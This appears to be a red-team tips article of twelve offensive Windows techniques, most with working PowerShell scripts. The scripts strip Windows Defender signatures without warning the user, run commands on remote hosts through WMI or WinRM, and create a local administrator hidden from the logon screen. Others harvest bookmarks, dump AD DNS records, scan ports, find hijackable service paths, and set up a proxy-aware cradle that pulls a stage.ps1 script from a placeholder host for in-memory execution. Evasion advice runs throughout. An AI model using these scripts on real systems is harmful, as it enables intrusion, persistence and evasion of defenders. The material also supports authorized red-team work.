The term Red Team comes from the military, where it denotes a "friendly" attacking force. The difference between a Red Team operation and a classic pentest lies primarily in the rules of engagement and in whether the defending side is warned. A classic pentest usually works from a whitelist of targets and carries restrictions on the work performed and on the depth of interaction with the systems. A Red Team operation drops those restrictions and carries out a realistic attack on the infrastructure: from attacks on the external perimeter, through physical access attempts, to "hard" sociotechnical techniques (not just recording that a link was clicked but, for example, obtaining a full reverse shell). In this respect the Red Team approach is closest to a targeted attack, the Advanced Persistent Threat (APT). A Red Team should consist of experienced professionals with a background both in building IT/IS infrastructure and in compromising systems.
The choice of toolkit in a given case may be dictated by the specifics of a particular application or service, and it differs from that of an ordinary penetration test. During a Red Team operation the question of team coordination and of systematizing the results arises: the reports of the various analysis tools plus the vulnerabilities found by hand add up to a huge amount of information, and without proper order and a systematic approach something important can be missed or duplicates can creep in. The reports also need to be consolidated, normalized and brought to a single form. Red Team operations usually cover fairly large infrastructures, which calls for specialized tools:
1. "The command prompt has been disabled by your administrator." Commonly seen on kiosk computers. A quick bypass is the /k switch of cmd.exe, launched from the Run dialog (Win+R): the command given after /k is executed first, and only then is the restriction message displayed.
2. Want to know whether you are in a virtual machine? Query the registry and find out: if any of the keys left behind by a hypervisor's guest tools or virtual hardware show up, you are in a VM.
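The registry check described in that tip, as an added example (not code from the original page). Which keys and strings count as evidence is my own list; it covers VMware, VirtualBox, Hyper-V and QEMU/KVM guests, not every hypervisor, and a hardened sandbox can scrub all of them.

```powershell
# Added example: look for registry artifacts of hypervisor guest tools and virtual hardware.
# Key list is an assumption (VMware, VirtualBox, Hyper-V, QEMU/KVM); it is not exhaustive.
function Test-VirtualMachineRegistry {
    $hits = @()

    # 1. Guest-tools / driver keys that only exist inside a guest
    $vmKeys = @(
        'HKLM:\SOFTWARE\VMware, Inc.\VMware Tools',
        'HKLM:\SOFTWARE\Oracle\VirtualBox Guest Additions',
        'HKLM:\SYSTEM\CurrentControlSet\Services\VBoxGuest',
        'HKLM:\SYSTEM\CurrentControlSet\Services\VBoxMouse',
        'HKLM:\SYSTEM\CurrentControlSet\Services\vmtools',
        'HKLM:\SYSTEM\CurrentControlSet\Services\vmhgfs',
        'HKLM:\SYSTEM\CurrentControlSet\Services\vmicheartbeat',        # Hyper-V integration services
        'HKLM:\SOFTWARE\Microsoft\Virtual Machine\Guest\Parameters'     # Hyper-V KVP exchange
    )
    foreach ($k in $vmKeys) {
        if (Test-Path $k) { $hits += "key present: $k" }
    }

    # 2. SMBIOS strings the hypervisor's firmware reports (VMware, Inc. / innotek GmbH / QEMU ...)
    $bios = Get-ItemProperty 'HKLM:\HARDWARE\DESCRIPTION\System\BIOS' -ErrorAction SilentlyContinue
    $pattern = 'VMware|VirtualBox|innotek|QEMU|Virtual Machine|Xen|KVM|Parallels'
    foreach ($name in 'SystemManufacturer', 'SystemProductName', 'BIOSVendor', 'BaseBoardManufacturer') {
        $v = $bios.$name
        if ($v -and $v -match $pattern) { $hits += "${name}: $v" }
    }

    # 3. Disk identifiers enumerated at boot, e.g. "VMware Virtual disk" or "VBOX HARDDISK"
    $scsi = 'HKLM:\HARDWARE\DEVICEMAP\Scsi'
    if (Test-Path $scsi) {
        foreach ($sub in Get-ChildItem $scsi -Recurse -ErrorAction SilentlyContinue) {
            $id = (Get-ItemProperty $sub.PSPath -ErrorAction SilentlyContinue).Identifier
            if ($id -and $id -match 'VMware|VBOX|QEMU|Virtual') { $hits += "disk: $id" }
        }
    }

    [pscustomobject]@{
        IsVirtual = ($hits.Count -gt 0)
        Evidence  = $hits
    }
}

Test-VirtualMachineRegistry
```

Everything here is readable as a standard user, so it works from the first foothold. Treat a clean result as "no evidence", not proof of bare metal: analysis sandboxes routinely rename these services and patch the SMBIOS strings.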
3. It sounds odd, but if Windows Defender is giving you a major headache, then instead of turning it off (which warns the user) simply neutralize it by removing all of its signatures.
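How the signature removal looks in practice, as an added example (not from the original page). It relies on Microsoft's own MpCmdRun.exe switch for rolling back definitions and on the built-in Defender module; the install path is the default one and is an assumption.

```powershell
# Added example: strip Defender's signatures without touching real-time protection.
# Requires local admin. Path assumes a default Defender install.
$mpCmdRun = Join-Path $env:ProgramFiles 'Windows Defender\MpCmdRun.exe'

function Get-DefenderSignatureState {
    # Get-MpComputerStatus ships with the Defender PowerShell module on every supported Windows
    $s = Get-MpComputerStatus
    [pscustomobject]@{
        RealTimeProtection    = $s.RealTimeProtectionEnabled      # stays enabled: no user prompt
        AntivirusSignatures   = $s.AntivirusSignatureVersion
        AntispywareSignatures = $s.AntispywareSignatureVersion
        SignaturesUpdated     = $s.AntivirusSignatureLastUpdated
    }
}

'Before:'; Get-DefenderSignatureState

# -RemoveDefinitions -All rolls back every installed signature set
& $mpCmdRun -RemoveDefinitions -All

'After:';  Get-DefenderSignatureState
```

Two caveats a practitioner wants: the next scheduled definition update (or a `Update-MpSignature` run by an admin) restores everything, so the window is short; and cloud-delivered protection and the behavioural engine keep working, because they do not depend on the local signature files. The rollback is also visible to any central Defender management console, so it is quiet on the endpoint rather than quiet overall.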
4. Enumeration is 95% of the work, but running lots of scans to map the environment is very noisy. Why not query the DC/DNS server for all DNS records instead?
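One way to do that query with nothing but .NET/ADSI, as an added example that is not part of the original page: AD-integrated DNS zones are stored as `dnsNode` objects in the DomainDnsZones and ForestDnsZones partitions, and any domain user can read them over LDAP, so the whole zone comes back in one paged search without a single probe packet. The record layout decoded below is the MS-DNSP `DNS_RPC_RECORD` structure; the partition names and DN layout are the Microsoft defaults.

```powershell
# Added example: dump AD-integrated DNS zones over LDAP, no DnsServer module, no scanning.
# Record layout per MS-DNSP DNS_RPC_RECORD: DataLength(2) Type(2) Version(1) Rank(1)
# Flags(2) Serial(4) TtlSeconds(4) Reserved(4) TimeStamp(4) followed by the record data.
function Get-AdDnsRecords {
    param(
        # DomainDnsZones holds the domain zone; ForestDnsZones holds forest-wide ones (_msdcs).
        [ValidateSet('DomainDnsZones', 'ForestDnsZones')]
        [string]$Partition = 'DomainDnsZones'
    )
    $rootDse = [ADSI]'LDAP://RootDSE'
    $baseDN  = if ($Partition -eq 'ForestDnsZones') { "$($rootDse.rootDomainNamingContext)" }
               else                                  { "$($rootDse.defaultNamingContext)" }

    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    $searcher.SearchRoot = [ADSI]"LDAP://CN=MicrosoftDNS,DC=$Partition,$baseDN"
    $searcher.Filter     = '(objectClass=dnsNode)'
    $searcher.PageSize   = 1000          # paged results: real zones have far more than 1000 nodes
    [void]$searcher.PropertiesToLoad.AddRange([string[]]@('name', 'dnsRecord', 'distinguishedName'))

    foreach ($res in $searcher.FindAll()) {
        $dn   = [string]$res.Properties['distinguishedname'][0]
        $name = [string]$res.Properties['name'][0]
        # Node DN is DC=<host>,DC=<zone>,CN=MicrosoftDNS,... so the zone is the second RDN
        $zone = ($dn -split ',')[1] -replace '^DC='

        foreach ($raw in $res.Properties['dnsrecord']) {
            $rec = [byte[]]$raw
            if ($rec.Length -lt 24) { continue }
            $type = [BitConverter]::ToUInt16($rec, 2)
            $data = switch ($type) {
                1       { $rec[24..27] -join '.' }                                                   # A
                28      { (New-Object System.Net.IPAddress -ArgumentList (,[byte[]]$rec[24..39])).IPAddressToString } # AAAA
                default { "<type $type, $($rec.Length - 24) data bytes>" }                            # CNAME/SRV/... left undecoded
            }
            [pscustomobject]@{ Zone = $zone; Name = $name; Type = $type; Data = $data }
        }
    }
}

# All A records of the domain zone, one LDAP conversation with the DC
Get-AdDnsRecords | Where-Object Type -eq 1 | Sort-Object Zone, Name | Format-Table -AutoSize
```

Run it once per partition; the `_msdcs` zone with the DC SRV records lives in ForestDnsZones. Nodes that are missing from the output but resolve fine are worth a second look: a `dnsNode` a normal user cannot read usually means someone created it with a restrictive ACL, which is what ADIDNS tooling does.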
5. Tired of uploading Sysinternals PsExec.exe during lateral movement? Windows ships with the best alternative preinstalled. Try this.
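The tip does not say which built-in it has in mind. As an added example (not from the original page), here are the two that every supported Windows already carries and that need nothing copied to the target: WMI process creation over DCOM and PowerShell remoting over WinRM. Host name and command are placeholders.

```powershell
# Added example: PsExec-style remote execution with Windows built-ins only.
# Both need local admin on the target. $target and $payload are placeholders.
$target  = 'SRV01'
$payload = 'cmd.exe /c whoami > C:\Windows\Temp\who.txt'

# 1. WMI (DCOM, TCP/135 plus a dynamic port): Win32_Process.Create on the remote host.
#    Works even when WinRM is disabled. Returns at once: ReturnValue 0 = process started.
#    Nothing comes back, so redirect output to a file and fetch it over SMB.
$r = Invoke-WmiMethod -ComputerName $target -Class Win32_Process -Name Create -ArgumentList $payload
"WMI: ReturnValue=$($r.ReturnValue) ProcessId=$($r.ProcessId)"
Start-Sleep -Seconds 2
Get-Content "\\$target\C$\Windows\Temp\who.txt"

# 2. PowerShell remoting (WinRM, TCP/5985 or 5986): runs the block and streams output back.
Invoke-Command -ComputerName $target -ScriptBlock { whoami; hostname }
```

Why this beats PsExec from an evasion standpoint: PsExec copies PSEXESVC.exe to ADMIN$ and installs a service, which fires a 7045 service-install event on the target. The WMI route leaves a process whose parent is WmiPrvSE.exe and the WinRM route one under wsmprovhost.exe; both still produce a type 3 network logon (4624), so neither is invisible, just less distinctive than a new service.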
6. Sometimes you want to log into a host via RDP or similar, but your user already has an active session there. Enable multiple sessions per user.
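The setting behind that tip, as an added example (not from the original page): `fSingleSessionPerUser` under the Terminal Server key decides whether a second logon by the same account is reconnected to the existing session (1) or gets a fresh one alongside it (0).

```powershell
# Added example: allow a second RDP session for an account that is already logged on.
# Needs local admin on the host; takes effect for the next logon, not for active sessions.
$tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'

function Get-SessionPolicy {
    $p = Get-ItemProperty -Path $tsKey
    [pscustomobject]@{
        SingleSessionPerUser = [bool]$p.fSingleSessionPerUser
        RdpDisabled          = [bool]$p.fDenyTSConnections    # 1 = RDP switched off altogether
    }
}

function Enable-MultipleSessionsPerUser {
    # Record the old value so it can be put back when the engagement ends
    $old = (Get-ItemProperty -Path $tsKey).fSingleSessionPerUser
    Set-ItemProperty -Path $tsKey -Name fSingleSessionPerUser -Value 0 -Type DWord
    "fSingleSessionPerUser: $old -> 0"
}

Get-SessionPolicy
Enable-MultipleSessionsPerUser
Get-SessionPolicy

# Who is on the box right now (built-in); useful before deciding whether to take the session over instead
quser
```

Two things to check before relying on it. A GPO can pin the same value under `HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services`, and the policy copy wins at the next refresh. And the trick is for Windows Server: client SKUs allow a single interactive session in total, so connecting there still bumps whoever is at the console, active session or not.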
7. Where possible, live off the land instead of uploading tools (for many reasons). PowerShell/.NET helps here. For example: a simple port scanner in PowerShell.
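The port scanner the tip mentions is missing from the page; the following is an added example of one, not the author's code. It uses only `System.Net.Sockets.TcpClient`, present in every PowerShell version, and issues all connects asynchronously with a single deadline so that filtered ports do not stall the scan. The default port list is my choice.

```powershell
# Added example: TCP connect scanner built on .NET only, nothing uploaded to the host.
function Invoke-PortScan {
    param(
        [Parameter(Mandatory)][string]$Target,
        [int[]]$Ports = @(21, 22, 23, 25, 53, 80, 88, 135, 139, 389, 443, 445, 636, 1433, 3306, 3389, 5985, 5986, 8080),
        [int]$TimeoutMs = 500
    )
    # Kick off every connect first; BeginConnect returns immediately
    $pending = @{}
    foreach ($p in $Ports) {
        $c = New-Object System.Net.Sockets.TcpClient
        $pending[$p] = @{ Client = $c; Async = $c.BeginConnect($Target, $p, $null, $null) }
    }

    # Then collect results against one shared deadline rather than $TimeoutMs per port
    $deadline = (Get-Date).AddMilliseconds($TimeoutMs)
    foreach ($p in $Ports) {
        $entry     = $pending[$p]
        $remaining = [int][math]::Max(0, ($deadline - (Get-Date)).TotalMilliseconds)
        $open      = $false
        if ($entry.Async.AsyncWaitHandle.WaitOne($remaining)) {
            # Completed: EndConnect either succeeds (open) or throws (RST, unreachable)
            try   { $entry.Client.EndConnect($entry.Async); $open = $entry.Client.Connected }
            catch { $open = $false }
        }
        # Still pending after the deadline counts as closed/filtered
        $entry.Client.Close()
        [pscustomobject]@{ Target = $Target; Port = $p; Open = $open }
    }
}

Invoke-PortScan -Target 10.0.0.5 | Where-Object Open
```

Keep in mind that this is exactly the noisy activity the previous tip warns about, only from a host the blue team trusts: every probe is a real SYN that the target's firewall log or an IDS will record. Use it on a handful of ports on a host you already found via DNS, not as a sweep.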
8. You will be surprised what you can learn just from a user's bookmarks, for example the internal endpoints they have access to.
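How to harvest those bookmarks, as an added example that is not part of the original page. Chrome and Edge keep them in a plain JSON file under the profile directory (the paths are the vendors' defaults); the test for "internal" is a heuristic of mine, and Firefox is left out because its `places.sqlite` needs an SQLite reader.

```powershell
# Added example: collect Chromium-based browser bookmarks and keep those pointing at internal hosts.
# File paths are the Chrome/Edge defaults for the default profile; the internal-host test is a heuristic.
$bookmarkFiles = @(
    "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Bookmarks",
    "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Bookmarks"
)

function Expand-BookmarkNode {
    # Walk the folder tree recursively and emit one object per URL node
    param($Node, [string]$Folder)
    if ($Node.type -eq 'url') {
        [pscustomobject]@{ Folder = $Folder; Name = $Node.name; Url = $Node.url }
    } elseif ($Node.children) {
        foreach ($c in $Node.children) { Expand-BookmarkNode -Node $c -Folder "$Folder/$($Node.name)" }
    }
}

function Get-BrowserBookmarks {
    foreach ($f in $bookmarkFiles | Where-Object { Test-Path $_ }) {
        $json = Get-Content -Raw -Path $f | ConvertFrom-Json
        # roots holds bookmark_bar, other and synced, each a folder node (plus a version string we skip)
        foreach ($root in $json.roots.PSObject.Properties) {
            if ($root.Value.type -eq 'folder') { Expand-BookmarkNode -Node $root.Value -Folder '' }
        }
    }
}

function Test-InternalUrl {
    param([string]$Url)
    try { $u = [uri]$Url } catch { return $false }
    if ($u.Scheme -notin 'http', 'https') { return $false }
    $h = $u.Host
    # RFC 1918 addresses, single-label names (resolved via the search suffix) and common internal TLDs
    ($h -match '^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)') -or
    ($h -notmatch '\.') -or
    ($h -match '\.(local|lan|corp|internal|intranet)$')
}

Get-BrowserBookmarks | Where-Object { Test-InternalUrl $_.Url } | Format-Table Folder, Name, Url -AutoSize
```

The folder names are often as telling as the URLs ("Prod", "Jenkins", "HR portal"), and the file is readable by the user whose context you already run in, so nothing here needs elevation or touches the network.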
9. Today most large organizations use web proxies. The default PowerShell one-line downloader does not handle an authenticating proxy. Use this one.
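A proxy-aware download cradle, as an added example (not the one the original page had in mind, which is missing here). The difference from the plain `New-Object Net.WebClient` one-liner is that it picks up the user's configured proxy (WinINET settings, PAC or WPAD) and authenticates to it as the logged-on user; the URL is a placeholder.

```powershell
# Added example: download cradle that uses the system proxy and authenticates to it.
# URL is a placeholder; the User-Agent string is an arbitrary browser-like value.
function Get-ViaProxy {
    param([Parameter(Mandatory)][string]$Url)

    # Older hosts default to TLS 1.0; most servers refuse that today
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    $wc = New-Object System.Net.WebClient
    # Proxy exactly as the user's browser sees it (static setting, PAC file or WPAD)
    $wc.Proxy = [System.Net.WebRequest]::GetSystemWebProxy()
    # Pass the current logon (NTLM/Kerberos) to the proxy; this is the part the default cradle lacks
    $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
    # An empty or "WebClient" agent is a cheap thing for a proxy to block or flag
    $wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36')
    $wc.DownloadString($Url)
}

# Typical use: pull a script straight into memory
# IEX (Get-ViaProxy 'https://example.invalid/stage.ps1')
(Get-ViaProxy 'https://example.invalid/stage.ps1').Length
```

The trade-off is that the proxy now has a complete record of the request tied to the user's account, and if the organization does TLS inspection it also has the content. Pick a host and path that look like what that user normally fetches.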
10. Creating accounts is risky when you are evading the blue team, but if you do create a local admin, use a little registry trickery to hide it.
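The registry trick in question, as an added example (not from the original page): a DWORD 0 named after the account under Winlogon's `SpecialAccounts\UserList` removes it from the logon screen and the Accounts control panel. Account name, password and description are placeholders.

```powershell
# Added example: create a local admin and hide it from the logon screen / Accounts UI.
# Needs local admin. Name, password and description are placeholders.
$name     = 'svc_backup'
$pass     = ConvertTo-SecureString 'Placeholder-Passw0rd!' -AsPlainText -Force
$userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'

# Create the account and add it to Administrators (Security log 4720 / 4732 fire regardless)
New-LocalUser -Name $name -Password $pass -PasswordNeverExpires -AccountNeverExpires -Description 'Backup agent' | Out-Null
Add-LocalGroupMember -Group 'Administrators' -Member $name

# Hide it: the UserList key usually does not exist yet and has to be created
if (-not (Test-Path $userList)) { New-Item -Path $userList -Force | Out-Null }
New-ItemProperty -Path $userList -Name $name -Value 0 -PropertyType DWord -Force | Out-Null

# What the hide does NOT cover: the account is still plainly listed here
Get-LocalUser -Name $name | Select-Object Name, Enabled, LastLogon
Get-LocalGroupMember -Group 'Administrators' | Where-Object Name -like "*\$name"

# Clean-up at the end of the engagement:
# Remove-ItemProperty -Path $userList -Name $name; Remove-LocalUser -Name $name
```

Be clear about what this buys: it defeats a glance at the Welcome screen or the Users applet, nothing more. `net user`, `Get-LocalUser`, the Administrators group membership and the 4720/4732 events all still show the account, which is why the tip calls account creation risky in the first place. On hosts without the LocalAccounts module (pre-Windows 10), `net user /add` and `net localgroup Administrators /add` do the first two steps.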
11. Unquoted service paths without PowerUp.
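What that tip reduces to, as an added example (not from the original page): a WMI query for services whose `PathName` is unquoted and contains a space, plus a writability check on each directory the service control manager would try before reaching the real binary. The exclusion of `\Windows\` paths mirrors what PowerUp does; the writability probe is my own.

```powershell
# Added example: find unquoted service paths and the hijack points they expose, no PowerUp needed.
function Test-DirectoryWritable {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return $false }
    # Simple, reliable check: create and delete a throwaway file (note: this is a file-create event)
    $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
    try { [IO.File]::WriteAllText($probe, ''); Remove-Item $probe -Force; $true } catch { $false }
}

function Get-UnquotedServicePath {
    $svcs = Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -notmatch '^[A-Za-z]:\\Windows\\' }

    foreach ($s in $svcs) {
        # Drop arguments: the executable is everything up to the first ".exe"
        $exe = ($s.PathName -split '(?i)\.exe')[0] + '.exe'
        if ($exe -notmatch ' ') { continue }     # quoted-or-not does not matter without a space

        # Each space is a candidate the SCM tries first:
        #   C:\Program Files\My App\svc.exe  ->  C:\Program.exe, C:\Program Files\My.exe
        $parts = $exe -split ' '
        $candidates = for ($i = 1; $i -lt $parts.Count; $i++) {
            ($parts[0..($i - 1)] -join ' ') + '.exe'
        }
        $writable = foreach ($c in $candidates) {
            if (Test-DirectoryWritable (Split-Path $c -Parent)) { $c }
        }

        [pscustomobject]@{
            Service    = $s.Name
            StartMode  = $s.StartMode
            RunAs      = $s.StartName
            Path       = $s.PathName
            Hijackable = @($writable)
        }
    }
}

Get-UnquotedServicePath | Where-Object { $_.Hijackable.Count -gt 0 } | Format-List
```

A hit is only useful if all three line up: a writable intermediate directory, a service that runs as a more privileged account than you (`RunAs`), and a way to get it restarted (`StartMode` Auto plus a reboot, or a service you can stop and start yourself). Note that the writability probe creates and deletes a file; if Sysmon or an EDR watches file creation in `C:\` or `Program Files`, prefer inspecting ACLs with `Get-Acl` instead.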
12. Tired of Windows Defender deleting mimikatz.exe? Try this.